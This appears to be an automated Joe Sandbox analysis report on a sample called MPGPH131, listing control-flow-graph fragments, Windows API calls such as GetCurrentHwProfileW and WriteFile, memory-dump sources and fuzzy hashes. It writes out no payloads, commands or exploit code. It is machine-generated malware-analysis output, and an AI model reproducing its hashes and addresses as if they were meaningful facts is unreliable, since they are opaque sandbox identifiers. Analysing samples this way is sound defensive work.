                                    • Opcode Fuzzy Hash: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
                                    • Instruction Fuzzy Hash: 8E31A1726047496BC7209B288C84A3BB7E5FF89734F001F19F9A8932E0E37199158692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 72 54c0b92-54c0c65 82 54c0c66-54c0c7d GetCurrentHwProfileW 72->82 83 54c0c82-54c0ce3 call 54c0ce7 82->83 87 54c0ce5 83->87
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID: kGPR
                                    • API String ID: 2104809126-2271762903
                                    • Opcode ID: 1eaa9fd1738cd3364c24f112b5a1c5075cfd401e22f7f258aba97046ea9896bf
                                    • Instruction ID: a552080b15766a435ff12739834fea2b7ebbd992064b08edd58d04f383e17290
                                    • Opcode Fuzzy Hash: 1eaa9fd1738cd3364c24f112b5a1c5075cfd401e22f7f258aba97046ea9896bf
                                    • Instruction Fuzzy Hash: FD2165EF60C221BDB555C0812B68AFF5BBED5D173073184ABF407C2146E2994E4F5071

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 88 922f0c-922f2e 89 923121 88->89 90 922f34-922f36 88->90 93 923123-923127 89->93 91 922f62-922f85 90->91 92 922f38-922f57 call 912193 90->92 95 922f87-922f89 91->95 96 922f8b-922f91 91->96 99 922f5a-922f5d 92->99 95->96 98 922f93-922fa4 95->98 96->92 96->98 100 922fa6-922fb4 call 91bbed 98->100 101 922fb7-922fc7 call 922a51 98->101 99->93 100->101 106 923010-923022 101->106 107 922fc9-922fcf 101->107 108 923024-92302a 106->108 109 923079-923099 WriteFile 106->109 110 922fd1-922fd4 107->110 111 922ff8-92300e call 922622 107->111 112 923065-923077 call 922ace 108->112 113 92302c-92302f 108->113 116 9230a4 109->116 117 92309b-9230a1 109->117 114 922fd6-922fd9 110->114 115 922fdf-922fee call 9229e9 110->115 134 922ff1-922ff3 111->134 139 92304c-92304f 112->139 120 923051-923063 call 922c92 113->120 121 923031-923034 113->121 114->115 122 9230b9-9230bc 114->122 115->134 119 9230a7-9230b2 116->119 117->116 126 9230b4-9230b7 119->126 127 92311c-92311f 119->127 120->139 128 92303a-923047 call 922ba9 121->128 129 9230bf-9230c1 121->129 122->129 126->122 127->93 128->139 136 9230c3-9230c8 129->136 137 9230ef-9230fb 129->137 134->119 140 9230e1-9230ea call 91ac78 136->140 141 9230ca-9230dc 136->141 142 923105-923117 137->142 143 9230fd-923103 137->143 139->134 140->99 141->99 142->99 143->89 143->142
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00916AF7,?,00000000,00000000,00000000,?,00000000,?,0090C023,00916AF7,00000000,0090C023,?,?), ref: 00923091
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 18559e2b6b0dd1c8b30067557f1f5257e1aa896f0807445a4f3b956ee0a329da
                                    • Instruction ID: f4171a5361d03dbe5752c6877bdeea6ac4cb9033177d5b0c5e6bb6b28e89f8ff
                                    • Opcode Fuzzy Hash: 18559e2b6b0dd1c8b30067557f1f5257e1aa896f0807445a4f3b956ee0a329da
                                    • Instruction Fuzzy Hash: A361E471D04129BFDF11DFA8E984AFEBBB9AF49304F144145E900AB25AC379DE11DBA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 146 54c0b15-54c0c65 163 54c0c66-54c0c7d GetCurrentHwProfileW 146->163 164 54c0c82-54c0ce3 call 54c0ce7 163->164 168 54c0ce5 164->168
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 93faca00bfd1b99d18f9e21b7ed4f464ddd256a06ae82c555aee13e6a0c855cf
                                    • Instruction ID: 2fe48806741bf6b099f1b7c27def11d1324a98b14682484211b9e3bc980e2166
                                    • Opcode Fuzzy Hash: 93faca00bfd1b99d18f9e21b7ed4f464ddd256a06ae82c555aee13e6a0c855cf
                                    • Instruction Fuzzy Hash: EA2164FB64D221FDB595C5812B5CAFF6ABEE6D273473184AFF40BC2102E2954D8A5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 169 54c0b26-54c0c65 186 54c0c66-54c0c7d GetCurrentHwProfileW 169->186 187 54c0c82-54c0ce3 call 54c0ce7 186->187 191 54c0ce5 187->191
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: bc3131076226f7ead9805434ca655c9b764edaa92e2be822d564d790bdf94976
                                    • Instruction ID: 35b8b561c51122753df234da23ef16dae6e64753d695c43b892b842c0a91265a
                                    • Opcode Fuzzy Hash: bc3131076226f7ead9805434ca655c9b764edaa92e2be822d564d790bdf94976
                                    • Instruction Fuzzy Hash: 0A2184FB60C221FDB195C5812B58AFF6BBEEAD273473184AFF40BC2102E2954D8A5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 192 54c0b44-54c0c65 208 54c0c66-54c0c7d GetCurrentHwProfileW 192->208 209 54c0c82-54c0ce3 call 54c0ce7 208->209 213 54c0ce5 209->213
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 81616d595d1d824d05c3e29c517c178a9ac512cb554a66ebdea9a290796c2451
                                    • Instruction ID: 92b9ccbf5445fe5c8fe9b5ffbb70410d39eff8200e56475abb75c93429a30a98
                                    • Opcode Fuzzy Hash: 81616d595d1d824d05c3e29c517c178a9ac512cb554a66ebdea9a290796c2451
                                    • Instruction Fuzzy Hash: 5721A5FB60C225FDB295C1812B58AFF6BBEE6C177473184AFF807C2546E2984E4A5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 214 89ba20-89ba3f 215 89bb6c call 832040 214->215 216 89ba45-89ba58 214->216 223 89bb71 call 831fa0 215->223 217 89ba5a 216->217 218 89ba83-89ba8b 216->218 222 89ba5c-89ba61 217->222 220 89ba8d-89ba92 218->220 221 89ba94-89baa4 218->221 220->222 224 89bab3-89bab5 221->224 225 89baa6-89baab 221->225 226 89ba64-89ba65 call 90cd02 222->226 232 89bb76-89bb7b call 912220 223->232 229 89bac7 224->229 230 89bab7-89bac5 call 90cd02 224->230 225->223 228 89bab1 225->228 236 89ba6a-89ba6f 226->236 228->226 235 89bac9-89baec 229->235 230->235 240 89baee-89bb18 call 90e9e0 call 90ef60 235->240 241 89bb43-89bb69 call 90e9e0 call 90ef60 235->241 236->232 237 89ba75-89ba81 236->237 237->235 250 89bb1a-89bb28 240->250 251 89bb2c-89bb40 call 90cf83 240->251 250->232 252 89bb2a 250->252 252->251
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0089BB71
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction ID: 8e33831dd2dc053828fe30de0cc3f36ae52405c48670f1ee53602caf4269c2db
                                    • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction Fuzzy Hash: CE41E2729011199FCF15EF68EE816AEB7A5FF84350F280669F815EB285D730DE1087D1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 255 54c0bab-54c0c65 265 54c0c66-54c0c7d GetCurrentHwProfileW 255->265 266 54c0c82-54c0ce3 call 54c0ce7 265->266 270 54c0ce5 266->270
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 724bf6ed6eb177772d9fcc85ba76a7c13b8c0074fce0ddd4eb41aa0b1561103d
                                    • Instruction ID: 491c3cb3629a7b67e7cc5d9e1d8fe87f997b68a699965bb1a2ece09aeda21188
                                    • Opcode Fuzzy Hash: 724bf6ed6eb177772d9fcc85ba76a7c13b8c0074fce0ddd4eb41aa0b1561103d
                                    • Instruction Fuzzy Hash: 1B2150EB20C224BDB595C0812F68AFF5BBED6D173073184ABF407C2546E2994E4E5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 271 54c0bbe-54c0c65 280 54c0c66-54c0c7d GetCurrentHwProfileW 271->280 281 54c0c82-54c0ce3 call 54c0ce7 280->281 285 54c0ce5 281->285
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: d107369657e980949a25e718c7e5bef74f99d2483872c304b2fa336b9853a1ad
                                    • Instruction ID: c07149523d90b8ce57df76cb494f90587398d6e176d7def6ca820d4478010951
                                    • Opcode Fuzzy Hash: d107369657e980949a25e718c7e5bef74f99d2483872c304b2fa336b9853a1ad
                                    • Instruction Fuzzy Hash: 9A1151FB60C224BDB595C0822B68AFF57BED6D173073184ABF407C2546E2994E8E5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 286 54c0bda-54c0c65 293 54c0c66-54c0c7d GetCurrentHwProfileW 286->293 294 54c0c82-54c0ce3 call 54c0ce7 293->294 298 54c0ce5 294->298
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 667b9625a125e96cd79181428210735cad02993c6a1ec12e5bbddc947865a0f2
                                    • Instruction ID: f96b6df7973fd7c69da4f8488fa8b9cc1a04b2883c3d046dbe0dc40b346b1c11
                                    • Opcode Fuzzy Hash: 667b9625a125e96cd79181428210735cad02993c6a1ec12e5bbddc947865a0f2
                                    • Instruction Fuzzy Hash: 201130FB60C224AD7595C1422B68AFB6ABED5D177033188ABF80BC6546E2944D8A5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 299 54c0bf0-54c0c04 300 54c0c66-54c0c7d GetCurrentHwProfileW 299->300 301 54c0c06-54c0c65 299->301 303 54c0c82-54c0ce3 call 54c0ce7 300->303 301->300 311 54c0ce5 303->311
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 5006ca93c50f89d2cf0e98c1d522621c3ec2994611516626936f8eb2e57af57b
                                    • Instruction ID: 22b155024e49eb4fac010b8b46a77474d6841c472fddad03fe01fe6930984fa5
                                    • Opcode Fuzzy Hash: 5006ca93c50f89d2cf0e98c1d522621c3ec2994611516626936f8eb2e57af57b
                                    • Instruction Fuzzy Hash: 5711BFEB20C124BD7296C1422B58EFB2ABED5C273033588ABF807C6546E2954D8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 312 54c0c20-54c0c27 313 54c0c08-54c0c1b 312->313 314 54c0c29 312->314 316 54c0c2b-54c0c65 313->316 314->316 320 54c0c66-54c0c7d GetCurrentHwProfileW 316->320 321 54c0c82-54c0ce3 call 54c0ce7 320->321 325 54c0ce5 321->325
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 0f9051a49622b09c72cc7008328b23dcd4c084cccacd6f9f0255e8dac1924765
                                    • Instruction ID: b2d638bb5e680168ef726a368d2815321132111174fa67e6018ba3e289462673
                                    • Opcode Fuzzy Hash: 0f9051a49622b09c72cc7008328b23dcd4c084cccacd6f9f0255e8dac1924765
                                    • Instruction Fuzzy Hash: 3A1130EF60C164BDB595C0422B68AFF5ABED6D6730731C8ABF807C2546E2954E8E5031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 326 54c0c3a-54c0c65 329 54c0c66-54c0c7d GetCurrentHwProfileW 326->329 330 54c0c82-54c0ce3 call 54c0ce7 329->330 334 54c0ce5 330->334
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 67a6e63b860795a626df1d1de49887b80c064e05856225a428b138b4f1985a37
                                    • Instruction ID: 6b4b79dcb424b20c6a76c627e025f796b4f3b59ac3ac51356f8e9d448793783e
                                    • Opcode Fuzzy Hash: 67a6e63b860795a626df1d1de49887b80c064e05856225a428b138b4f1985a37
                                    • Instruction Fuzzy Hash: 330121EB60C2607D7596C0822F64EFB67BED5D2B70331C86BF807C2546E2954E8E5071

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 335 54c0c45-54c0c65 337 54c0c66-54c0c7d GetCurrentHwProfileW 335->337 338 54c0c82-54c0ce3 call 54c0ce7 337->338 342 54c0ce5 338->342
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: e3289ecbed88a1cd3aa42db1d01c25087ea825ca7b42fa56229819c54cef3112
                                    • Instruction ID: b0d94bb2204a744b06ced37c7cb109ff51d65cca9cd620f8e5ce31d3e22af372
                                    • Opcode Fuzzy Hash: e3289ecbed88a1cd3aa42db1d01c25087ea825ca7b42fa56229819c54cef3112
                                    • Instruction Fuzzy Hash: A9012CEB60C2607D7592C1862B24EFB57BED9D2B30331C86BF806C2546E2994E8E6071
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: ec85f34a5538fab9995556ebae7729c2315bafa810b6921f9634788e342419ef
                                    • Instruction ID: 6bff85e86e9c50eb07c6e85432e52505ef646735e77159d904100c66a2933450
                                    • Opcode Fuzzy Hash: ec85f34a5538fab9995556ebae7729c2315bafa810b6921f9634788e342419ef
                                    • Instruction Fuzzy Hash: A60171FB60C2606EB246C5422B64AFB67BDD9D2730331C87BF407C3546E2A54E8E9135
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00922469,00000000,CF830579,00961148,0000000C,00922525,0091662D,?), ref: 009225D8
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 5274f7ae896e7795a84d29fdc37086d372bfe961fa3582ef3df39920707e0fc7
                                    • Instruction ID: 5e0d73c3eadff3f6d9c2b2d191edb8910067410cc59f7a29e679246dc8965e9a
                                    • Opcode Fuzzy Hash: 5274f7ae896e7795a84d29fdc37086d372bfe961fa3582ef3df39920707e0fc7
                                    • Instruction Fuzzy Hash: 3711443360A23426C72423B47C5AFBF674D5FC2730F25420AF9089B1CAEE759C825291
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00960E00,0090C023,00000002,0090C023,00000000,?,?,?,0091BBD6,00000000,?,0090C023,00000002,00960E00), ref: 0091BB08
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 9ae696d8ec199a12ce71c424ff505d2d9fa9ad77397bebc2cdf2e884df41f0d7
                                    • Instruction ID: 38b4f51d7ba7c2f5e18ae47e2d66dda180a408db651e3e159e381fb566a58d33
                                    • Opcode Fuzzy Hash: 9ae696d8ec199a12ce71c424ff505d2d9fa9ad77397bebc2cdf2e884df41f0d7
                                    • Instruction Fuzzy Hash: B10126327141586FCF098F59CC45CEE3B6AEF85330B240248F9019B291EBB1ED819790
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00831FDE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
                                    • Instruction ID: e6ccb5141cf9581a5bde89276abba0c05989dfeffbf60cda4aa9a53057010b58
                                    • Opcode Fuzzy Hash: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
                                    • Instruction Fuzzy Hash: C001D67550430DBBCB24ABA8EC0198A7BACDE41764B508A35F918EB5D1FBB0E59087D1
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,0090B16C,?,?,009237E9,00000001,00000364,?,00000006,000000FF,?,0090E0EB,?,?,?,?), ref: 00923EA5
                                    Memory Dump Source
